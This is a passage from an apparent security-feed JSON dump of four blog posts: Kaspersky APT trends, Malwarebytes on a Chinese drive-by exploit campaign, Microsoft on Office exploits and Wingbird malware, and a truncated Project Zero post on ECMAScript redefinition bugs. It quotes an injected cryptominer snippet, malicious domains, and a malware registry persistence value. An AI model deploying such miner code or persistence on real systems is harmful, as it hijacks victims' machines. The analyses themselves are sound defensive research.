a listing of our reports from Q2 on actors with a Korean nexus:\n\n 1. Manuscrypt - malware family distributed by Lazarus\n 2. Lazarus actor targets carders\n 3. Lazarus-linked ATM Malware On the Loose In South Korea\n 4. Lazarus targets electronic currency operators\n 5. WannaCry - major ransomware attack hitting businesses worldwide - early alert\n 6. WannaCry possibly tied to the Lazarus APT Group\n 7. The First WannaCry Spearphish and Module Distribution\n\n## Middle Eastern Actors\n\nWhile there wasn't much high-end activity involving Middle Eastern actors, we did produce two reports revolving around the use of a zero-day exploit (CVE-2017-0199). The most notable involved an actor we refer to as BlackOasis and their usage of the exploit in-the-wild prior to its discovery. We have previously reported on BlackOasis using other zero-days in the past; CVE-2016-4117 in May 2016, CVE-2016-0984 in June 2015, and CVE-2015-5119 in June 2015. It is believed that BlackOasis is a customer of Gamma Group and utilizes the popular 'lawful surveillance' kit FinSpy. Other than the usage of the exploit, this report was significant because it also showed one of the earliest known uses of a new version of FinSpy, which is still being analyzed by our researchers.\n\nAfter the discovery of CVE-2017-0199, a plethora of threat actors also began to leverage this exploit in their attacks. We reported to customers on the usage of this exploit by a well-known Middle Eastern actor dubbed 'OilRig'. OilRig has actively targeted many organizations in Israel with the exploit via spearphishes appearing to originate from well-known doctors within Ben Gurion University. While their execution was less than stellar, it highlighted the widespread usage of this exploit shortly after its discovery.\n\n 1. OilRig exploiting CVE-2017-0199 in new campaign\n 2. BlackOasis using Ole2Link zero day exploit in the wild\n\n## Chinese-Speaking Actors\n\nOn the Chinese speaking front, we felt it necessary to produce two reports to our customers. While Chinese speaking actors are active on a daily basis, not much has changed and we prefer to avoid producing reports on 'yet another instance of APTxx' for the sake of padding our numbers. Instead we try to focus on new and exciting campaigns that warrant special attention.\n\nOne of those reports detailed a new finding regarding a fileless version of the well-known 'HiKit' malware dubbed 'Hias'. We have reported on Hias in the past, and one of our researchers was finally able to discover the persistence mechanism used, which also allowed us to tie the activity to an actor we call 'CloudComputating'.\n\nAnother report detailed a new campaign we referred to as 'IndigoZebra'. This campaign was targeting former Soviet Republics with a wide swath of malware including Meterpreter, Poison Ivy, xDown, and a previously unknown malware called 'xCaon'. This campaign shares ties with other well-known Chinese-speaking actors, but no definitive attribution has been made at this time.\n\n 1. Updated technical analysis of Hias RAT\n 2. IndigoZebra - Intelligence preparation to high-level summits in Middle Asia\n\n## Best of the rest\n\nSometimes we find new and exciting campaigns or entirely new threat actors to report to our subscribers without being able to make an immediate or definitive determination on regional provenance. Several reports fell into this category in the last quarter. ChasingAdder is a report describing a new persistence technique that hijacked a legitimate WMI DLL for the purposes of loading a malicious payload. This activity targeted high-profile diplomatic, military, and research organizations beginning in the fall of 2016, but to date we have not been able to pinpoint the specific actor responsible.\n\nDemsty is a new piece of MacOS malware that is targeting University researchers in Hong Kong, among others. At the time of writing, we have a low confidence assessment that the campaign was conducted by Chinese-speaking actors, and thus categorize this as 'Unknown' until greater evidence comes to light.\n\nDuring Q2, the mischievous ShadowBrokers also continued their regular activities dumping multiple tools and documentation allegedly stolen from Equation Group. In April, the ShadowBrokers released another dump of information detailing the alleged targeting of SWIFT service bureaus and other banks by Equation Group. Since some of our customers are financial entities, we found it necessary to evaluate the data and provide an expert's opinion on the validity of the dump.\n\nReports in the 'unknown' category:\n\n 1. ShadowBrokers' Lost in translation leak - SWIFT attacks analysis\n 2. ChasingAdder - WMI DLL Hijacking Trojan Targeting High Profile Victims\n 3. University Researchers Located in Hong Kong Targeted with Demsty\n\n## Predictions\n\nBased on the trends we've seen over the last three months, as well as foreseeable geopolitical events, we have listed a few predictions for the upcoming quarter (Q3). As always, this isn't an exact science and some cases won't come to fruition. Analyzing current and future events and combining those with the motivations of known active actors can help organizations prepare for likely forthcoming activity:\n\n 1. Misinformation campaigns will remain a threat to countries with upcoming elections, specifically Germany and Norway, as they have been previous targets for Eastern European based actors.\n 2. 'Lawful Surveillance' tools will continue to be utilized by governments that don't have well-established Cyber Operations capabilities, mainly based out of the Middle East. Companies such as Gamma Group, Hacking Team, and NSO will continue to offer new zero-day exploits to those customers. As prices increase and exchanges thrive, new organizations and marketplaces will continue popping up.\n 3. Destructive malware disguised as ransomware will continue to be a problem. In the last quarter we've seen two instances of this, and with the continued release of tools / exploits from dumps like Vault7 and ShadowBrokers, this is going to be a new alarming trend to deal with.\n 4. In China, the past months have been marked by the dwindling economic growth, rising tensions with North Korea and the US, and increased exchanges between South Korean / Japanese / American organizations. In addition to these, the 19th Party Congress is set to be held in the fall of 2017 and according to multiple public predictions, it is likely that some major changes will happen in the leadership. It's possible that these events will have wide regional influences that could affect the way that threat actors operate in Asia, both in terms of targeting and TTPs.\n 5. Targeting energy-related companies and organizations will be on the rise. Countries such as Norway may be a top target moving forward given their control on oil and gas in the region in the buildup to an election. Saudi Arabia will also top the charts for potential targeting as they have in years past.\n 6. Lower-tier threat actors continue to increase cyber-espionage efforts and capabilities both in complexity and size. Expect more activity with varied technical capabilities coming from lesser known or previously unseen actors.\n\n## How to keep yourself protected\n\nOne of the biggest problems when it comes to leveraging threat intelligence is judging the quality of the data and how it can be used for defense. For instance, we may observe an increase in the number of fileless attacks or attacks in which all IOCs are unique or specific per victim. In such situations, having not only host-based IOCs, but also network IOCs and Yara rules that can help identify malware in all cases is very important.\n\nAnother problem comes from the fact that many threat intelligence providers have a limited world view and their data covers only a small set of threats. It's easy for an enterprise to fall into the trap of thinking that 'actor X' is not something they need to worry because their focus has been only certain countries or certain industry sectors; only to discover later that their ignorance left them blind to those attacks.\n\nAs shown by many incidents, but especially by WannaCry and ExPetr's EternalBlue-based spreading subroutines, vulnerabilities remain a key approach to infecting systems. Therefore timely patching is of utmost importance \u2013 which, being one of the most tedious IT maintenance tasks, works much better with good automation. Kaspersky Endpoint Security for Business Advanced and Kaspersky Total Security include Vulnerability &amp; Patch management components, offering convenient tools for making patching much easier, and much less time-consuming for IT staff.\n\nGiven the above, it is highly recommended that prevention (such as endpoint protection) along with advanced detection capabilities, such as a solution that can detect all types of anomalies and scrutinize suspicious files at a deeper level, be present on users' systems. The Kaspersky Anti Targeted Attack solution (KATA) matches events coming from different infrastructure levels, discerns anomalies and aggregates them into incidents, while also studying related artifacts in a safe environment of a sandbox. As with most Kaspersky products, KATA is powered by HuMachine Intelligence, which is backed by on premise and in lab-running machine learning processes coupled with real-time analyst expertise and our understanding of threat intelligence big data.\n\nThe best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those involving improper system configurations or errors in proprietary applications. For this, Kaspersky Penetration Testing and Application Security Assessment services can become a convenient and highly effective solution, providing not only data on found vulnerabilities, but also advising on how to fix it, further strengthening corporate security.", "cvss3": {}, "published": "2017-08-08T14:00:40", "title": "APT Trends report Q2 2017", "type": "securelist", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-5119", "CVE-2016-0984", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-08-08T14:00:40", "href": "https://securelist.com/apt-trends-report-q2-2017/79332/", "id": "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2018-02-22T16:50:35", "description": "During our web crawls we sometimes come across bizarre findings or patterns we haven't seen before. This was the case with a particular drive-by download attack planted on Chinese websites. While by no means advanced (it turned out to be fairly buggy), we witnessed a threat actor experimenting with several different exploits to drop malware.\n\nFor years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/urlquery_results.png> \"\" )\n\nThe campaign we stumbled upon starts with sites that were compromised to load external content via scripts and iframe overlays. Although the browser's address bar shows _gusto-delivery[.]com_, there are several injected layers that expose visitors to unwanted code and malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/site_view1.png> \"\" )\n\nFor instance, we find a reference to a Coinhive clone_:_\n \n \n var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {\n threads: navigator.hardwareConcurrency,\n autoThreads: false,\n throttle: 0.2,\n forceASMJS: false\n });\n miner.start();\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_clone1.png> \"\" )\n\nWe are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at _ppoi[.]org_) only takes a 10 percent commission as opposed to 30 percent for Coinhive.\n \n \n \u4e5f\u5c31\u662f\u8bf4\uff0c\u60a8\u5c06\u83b7\u5f97\u6316\u77ff\u6536\u76ca\u768490%\uff0c\u4e0e\u77ff\u6c60\u4e0d\u540c\uff0c\u8fd9\u4e2a\u6536\u76ca\u662f\u56fa\u5b9a\u7684\uff0c\u4e0d\u8bba\u662f\u5426\u7206\u5757\u60a8\u90fd\u5c06\u83b7\u5f97\u8be5\u7b14\u6536\u76ca\n \u6211\u4eec\u5e0c\u671b\u4fdd\u755910%\u6765\u8865\u507f\u4e0d\u7206\u5757\u7684\u635f\u5931\uff0c\u7ef4\u6301\u670d\u52a1\u5668\u7684\u8fd0\u884c\u7b49\n \n I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this\n rate is fixed, regardless of actual blocks found and the luck involved finding them. \n We keep 10% for us to operate this service and to (hopefully) turn a profit.\n\nFinally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Flow.png> \"\" )\n\nOn top of a late addition of the aforementioned VBScript similar to the ones found on other Chinese websites, we notice the inclusion of 3 exploits targeting older vulnerabilities in an ActiveX component, the Flash Player and Internet Explorer.\n\n**CVE-2008-2551**\n\nThis old CVE is a vulnerability with the C6 Messenger ActiveX control. The threat actor reused the same code already published [here](<https://www.exploit-db.com/exploits/5732/>) and simply altered the DownloadUrl to point to their malicious binary. Users (unless their browser settings have been changed) will be presented with a prompt asking them to install this piece of malware.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2008-25511.png> \"\" )\n\n**CVE-2015-5119**\n\nThis is a Flash Player vulnerability affecting Flash up to version 18.0.0.194, which was again lifted from a proof of concept. Its implementation in this particular drive-by is somewhat unstable though and may cause the browser to crash.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2015-51191.png> \"\" )\n\n**CVE-2016-0189**\n\nFinally a more interesting CVE, the well-known Internet Explorer God Mode, although for some unexplained reason, the code was commented out.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/CVE-2016-01891.png> \"\" )\n\nThe final payload dropped in this campaign is a DDoS bot, which we will cover in another blog post.\n\n### Conclusion\n\nAlthough we see the use of several exploits, we cannot call this an exploit kit\u2014not even an amateur one. Indeed, the domain serving the exploits appears to be static and the URIs are always the same.\n\nRegardless, it does not prevent threat actors from arranging drive-by attacks by copying and pasting various pieces of code they can find here and there. While not very effective, they may still be able to compromise some legacy systems or machines that have not been patched.\n\n### Indicators of compromise\n\nMalicious redirection\n \n \n vip.rm028[].cn\n by007[.]cn\n\nExploit domain and IP\n \n \n shiquanxian.cn\n 103.85.226.65\n\nCVE-2008-2551\n \n \n 5E3AC16B7F55CA52A7B4872758F19D09BD4994190B9D114D68CAB9F1D9D5B467\n\nCVE-2015-5119\n \n \n D53F3FE4354ACFE7BD12528C20DA513DCEFA98B1D60D939BDE32C0815014137E\n\nPayload\n \n \n 65ABED6C77CC219A090EBEF73D6A526FCCEDAA391FBFDCB4B416D0845B3D0DBC\n\nThe post [Drive-by download campaign targets Chinese websites, experiments with exploits](<https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {}, "published": "2018-02-22T16:00:00", "type": "malwarebytes", "title": "Drive-by download campaign targets Chinese websites, experiments with exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2551", "CVE-2008-25511", "CVE-2015-5119", "CVE-2015-51191", "CVE-2016-0189", "CVE-2016-01891"], "modified": "2018-02-22T16:00:00", "id": "MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA", "href": "https://blog.malwarebytes.com/threat-analysis/2018/02/chinese-criminal-experiments-with-exploits-in-drive-by-download-campaign/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mssecure": [{"lastseen": "2018-01-16T03:40:26", "description": "The Office 365 Threat Research team has seen an uptick in the use of Office exploits in attacks across various industry sectors in recent months. In this blog, we will review several of these exploits, including a group of Office moniker exploits that attackers have used in targeted as well as crimeware attacks. We will also describe the payloads associated with these exploits andhighlight our research into a particularly sophisticated piece of malware. Finally, we will demonstrate how [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>), [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>), and [Windows Defender Exploit Guard ](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>)protect customers from these exploits.\n\n## Exploit attacks in Fall 2017\n\nThe discovery and public availability of a few Office exploits in the last six months led to these exploits gaining popularity among crimeware and targeted attackers alike. While crimeware attackers stick to payloads like [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) and [info stealers](<https://blogs.technet.microsoft.com/mmpc/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/>) to attain financial gain or information theft, more sophisticated attackers clearly distinguish themselves by using advanced and multi-stage implants.\n\nThe Office 365 Threat Research team has been closely monitoring these attacks. The Microsoft Threat Intelligence Center (MSTIC) backs up our threat research with premium threat intelligence services that we use to correlate and track attacks and the threat actors behind them.\n\n### CVE-2017-0199\n\n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>) is a remote code execution (RCE) vulnerability in Microsoft Office allows a remote attacker to take control of a vulnerable machine if the user chooses to ignore protected view warning message. The vulnerability, which is a logic bug in the URL moniker that executes the HTA content using the _htafile_ OLE object, was fixed in [April 2017 security updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/42b8fa28-9d09-e711-80d9-000d3a32fc99>).\n\n\n\n_Figure 1. CVE-2017-0199 exploit code_\n\nEver since [FireEye blogged](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) about the vulnerability, we have identified numerous attacks using this exploit. The original exploit was used in limited targeted attacks, but soon after, commodity crimeware started picking them up from the publicly available exploit generator toolkits. As shown in Figure 2, the creator and _lastModifiedBy_ attributes help identify the use of such toolkits in generating exploit documents.\n\n\n\n_Figure 2. Exploit kit identifier_\n\nA slight variation of this exploit, this time in script moniker, was also released. When activated, this exploit can launch [scriptlets](<https://msdn.microsoft.com/en-us/library/office/aa189871\\(v=office.10\\).aspx>) (which consist of HTML code and script) hosted on a remote server. A proof-of-concept (PoC) made publicly available used a Microsoft PowerPoint Slideshow (PPSX) file to activate the script moniker and execute a remote code, as shown in Figure 3.\n\n\n\n_Figure 3. PPSX activation for script moniker_\n\n### CVE-2017-8570\n\nThe [July 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/f2b16606-4945-e711-80dc-000d3a32fc99>) from Microsoft included a fix for another variation of the CVE-2017-0199 exploit, [CVE-2017-8570](<https://nvd.nist.gov/vuln/detail/CVE-2017-8750>), which was discovered in URL moniker that, similar to HTA files, can launch scriptlets hosted on a remote server. Even though the vulnerability was not exploited as zero-day, the [public availability](<https://github.com/Ring0Mob/CVE-2017-8570>) of exploit toolkit created a wave of malicious PPSX attachments.\n\n### CVE-2017-8759\n\nIn September 2017, [FireEye discovered](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) another zero-day exploit used in targeted attacks. The [CVE-2017-8759 exploit](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>) takes advantage of a code injection vulnerability in .Net Framework while parsing WSDL definition using SOAP moniker. The vulnerability was fixed in the [September 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>). The original exploit used an HTA file similar to CVE-2017-0199 to execute the attacker code in vulnerable machines. This exploit piqued our interest because it delivered one of the most complex and multiple VM-layered malware, FinFisher, whose techniques we discuss in the succeeding section.\n\nThe CVE-2017-8759 exploit soon got ported to PPSX file. Figure 4 below shows an example of the exploit.\n\n\n\n_Figure 4. CVE-2017-8759 exploit_\n\n### CVE-2017-11826\n\nFinally, onSeptember 28,2017, [Qihoo 360](<https://360coresec.blogspot.dk/2017/10/new-office-0day-cve-2017-11826.html>) identified an RTF file in targeted attacks that exploited a memory corruption vulnerability in Microsoft Office. The vulnerability exists in the way Office parses objects within nested Office tags and was fixed in the [October 2017 security update](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/313ae481-3088-e711-80e2-000d3a32fc99>). The forced address space layout randomization (ASLR) prevented the exploit from running in Office 2013 and above. Figure 5 shows the nested tags from the original exploit that led to the bug.\n\n\n\n_Figure 5. CVE-2017-11826 exploit_\n\n## Payloads\n\nExcept for the memory, corruption exploit CVE-2017-11826, the exploits discussed in this blog pull the malware payload from remote locations, which could make it difficult for antivirus and sandboxes to reliably detect these exploits. Additionally, the public availability of scripts that generate exploit templates could make it challenging for incident responders.\n\nAs cited above, these exploits were used in both commodity and targeted attacks. Attackers attempt to bypass AV engine defenses using different obfuscation techniques. Here are some of the obfuscation techniques used in attacks that we recently analyzed:\n\n * Attackers used HLFL as element type in the malicious RTF attachment. This element is not supported in RTF official specification but serves as an effective obfuscation for static detections.\n\n\n\n * Similarly, we have seen attackers using ATNREF and MEQARR elements in malicious RTF attachments.\n\n\n\nIn most of the attacks we analyzed, the exploits used PowerShell to download and execute malware payloads, which are usually crimeware samples like ransomware or info stealers.\n\n\n\n_Figure 6. PowerShell payload from the HTA file_\n\nHowever, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.\n\n### WingBird (also known as FinFisher)\n\n[Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) is an advanced piece of malware that shares characteristics with a government-grade commercial surveillance software, FinFisher. The activity group [NEODYMIUM](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) is known to use this malware in their attack campaigns.\n\nThe group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our [previous blog post on CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>). So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a [blog](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>):\n\n * CVE-2015-5119 (Adobe Flash)\n * CVE-2016-4117 (Adobe Flash)\n * CVE-2017-8759 (Microsoft Office)\n * CVE-2017-11292 (Adobe Flash)\n\nThe interesting part of this malware is the use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Heres a summary of interesting tidbits, which we will expand in an upcoming detailed report on Wingbird.\n\nThe Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that can probe if it is being run in virtualized or debugged environments. We found at least 12 different checks to evade the malwares execution in these environments. The most effective ones are:\n\n * Sandbox environment checks\n * Checks if the malware is executed under the root folder of a drive\n * Checks if the malware file is readable from an external source and if execution path contains the MD5 of its own contents\n\n\n\n * Fingerprinting check\n * Checks if the machine GUID, Windows product ID, and system Bios are from well-known sources\n * VM detection\n * Checks if the machine hardware IDs are _VmBus_ in case of HyperV, or _VEN_15AD_ in case of VMware, etc.\n * Debugger detection\n * Detects debugger and tries to kill it using undocumented APIs and information classes (specifically _ThreadHideFromDebugger_, _ProcessDebugPort_, _ProcessDebugObjectHandle_)\n\n\n\nThe latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:\n\n * _ [randomName].cab_ -Encrypted configuration file\n * _ setup.cab_ - The last PE code section of the setup module; content still unknown\n * _ d3d9.dll_ -Malware loader used on system with restricted privileges; the module is protected by a VM\n * _ aepic.dll_ (or other name) - Malware loader used on admin privileged systems; executed from (and injected into) a faked service; protected by a VM\n * _ msvcr90.dll_ - Malware loader DLL injected into explorer.exe or winlogon.exe process; protected by a VM\n * _ [randomName].7z_ - Encrypted network plugin, used to spy the victim network communications\n * _ wsecedit.rar_ - Main malware dropped executable, protected by a VM\n\nIn the sample we analyzed, the command was 3, which led the malware to create a global event, _0x0A7F1FFAB12BB2_, and drop malware components under a folder located in [_%ProgramData%_](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#programdata>), or in the _[%APPDATA%](<https://www.microsoft.com/en-us/wdsi/help/folder-variables#appdata>)_ folder. If the malware is running with restricted privileges, the persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.\n\n_HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run_ \n_ Value: \"{Random value taken from config file}\"_ \n_ With data: \"C:\\WINDOWS\\SYSTEM32\\RUNDLL32.EXE C:\\PROGRAMDATA\\AUDITAPP\\D3D9.DLL, CONTROL_RUN\"_\n\nIf the startup command is 2, the malware copies explorer.exe in the local installation directory, renames _d3d9.dll_ to _uxtheme.dll_, and creates a new _explorer.exe_ process that loads the malware DLL in memory using the DLL sideloading technique.\n\nAll of Wingbirds plugins are stored in its resource section and provide the malware various capabilities, including stealing sensitive information, spying on internet connection, or even diverting SSL connections.\n\nGiven the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.\n\n## Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite\n\nMicrosoft [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection?ocid=cx-blog-mmpc>) blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attack by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like below in Office 365s Threat Explorer page:\n\n\n\n\n\n_Figure 7. Office 365 ATP detection_\n\nCustomers using [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender Advanced ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.\n\n\n\n_Figure 8. Windows Defender ATP alert_\n\nIn addition, enterprises can block malicious documents using [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware?ocid=cx-blog-mmpc>), which is part of the defense-in-depth protection in [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>). The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).\n\n\n\n_Figure 9. Windows Defender Exploit Guard detection_\n\nCrimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.\n\nAtMicrosoft, we dont stop working to protect our customers mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide a holistic protection for individuals and enterprises.", "edition": 2, "cvss3": {}, "published": "2017-11-21T13:46:01", "type": "mssecure", "title": "Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119", "CVE-2016-4117", "CVE-2017-0199", "CVE-2017-1099", "CVE-2017-11292", "CVE-2017-11826", "CVE-2017-8570", "CVE-2017-8750", "CVE-2017-8759"], "modified": "2017-11-21T13:46:01", "id": "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:16", "description": "Posted by Natalie Silvanovich = function () { return n; }\n\n \n\n\nECMAScript has a property where almost all functions and variables can be dynamically redefined. This can lead to vulnerabilities in situations where native code assumes a function or variable behaves a certain way when accessed or does not have certain side effects when it can in fact be redefined. Project Zero has discovered 24 vulnerabilities involving ECMAScript redefinition in Adobe Flash in the past few months and similar issues have also been discovered in the wild. This post describes how this class of bugs works, alongside some examples of interesting bugs that have been recently patched.\n\n# ECMAScript Redefinition\n\n \n\n\nBeing a dynamically typed language, ECMAScript allows all functions to be redefined. For example, the JavaScript below redefines the alert method.\n\n \n\n\n&lt;script&gt;\n\nfunction f(mystring){\n\ndocument.write(mystring);\n\n}\n\nalert = f;\n\nalert(\u201chello\u201d);\n\n&lt;/script&gt;\n\n \n\n\nIn most browsers, this will cause the function document.write to be called instead of a native alert.\n\n \n\n\nWhile this example is fairly benign, in some situations this behaviour can be problematic and lead to bugs. In particular, if native code in the VM relies on an ECMAScript method having specific behavior, but it has been redefined, it can lead to many issues, especially type confusion, overflows and use-after-frees.\n\n# Past Redefinition Bugs\n\n \n\n\nMany security bugs involving redefinition have been discovered in the past. Some of the earliest bugs were bypasses of same-origin-policy in browsers, where redefining a JavaScript function could allow script from an insecure context to be executed. Issues of this type have been found as recently as [last year](<https://community.rapid7.com/community/metasploit/blog/2015/03/23/r7-2015-04-disclosure-mozilla-firefox-proxy-prototype-rce-cve-2014-8636>).\n\n \n\n\nIn the past couple of years, many memory corruption and use-after-free bugs of this type have been found in browsers, such as [CVE-2013-0765](<https://www.mozilla.org/en-US/security/advisories/mfsa2013-19/>) in Firefox and [CVE-2014-1705](<https://code.google.com/p/chromium/issues/detail?id=351787>) in Chrome.\n\n \n\n\nThe recent HackingTeam leak contained five Adobe Flash vulnerabilities, of which four involved redefinition ([CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472&can=1&q=reporter%3Ame>), CVE-2015-5122, CVE-2015-5123 and [CVE-2015-0349](<http://www.zerodayinitiative.com/advisories/ZDI-15-134/>)). An analysis of CVE-2015-5119 is included below\n\n \n\n\nHow to Redefine an Object\n\n \n\n\nOne of the main challenges in finding and exploiting redefinition vulnerabilities is reachability. Many of these issues exist deep in code, and it is not always obvious how to trigger them. Moreover, not all ECMA-based languages support redefinition to the same degree, and it often varies based on the specific function and method being redefined. That said, ECMAScript supports many methods of gaining access to objects, so it is often possible to reach redefinition using less-used ECMAScript functionality.\n\n# Equality Operator\n\n \n\n\nThe equality operator is the simplest way to redefine an object or function and it works to some extent in most ECMAScript implementations. In ActionScript 2, it works without restriction so long as a field doesn\u2019t have a setter defined (although sometimes the code doesn\u2019t compile and needs to be written directly in bytecode). Even read-only properties in AS2 can be redefined with the equality operator by calling ASSetProps to remove the read-only flag first. In ActionScript 3, only classes that are declared as dynamic can have their methods redefined using equality. In browsers, most methods can be redefined using equality, although one host function cannot be set to another host function directly. For example, in the code at the beginning of this post, alert can be set to document.write, but it needs to wrapped in the function f first. Direct assignment will cause the script to fail to execute.\n\n## CVE-2015-3077\n\n \n\n\n[CVE-2015-3077](<https://code.google.com/p/google-security-research/issues/detail?id=254>) is an example of a vulnerability in Flash that occurs because a function can be redefined using equality. A sample of the code that causes the issue is below. Note that this code has been simplified for clarity, and does not compile. A compiling sample of the code can be found in the Project Zero [bug tracker](<https://code.google.com/p/google-security-research/issues/detail?id=254&q=button>). \n\n \n\n\nvar blur = new 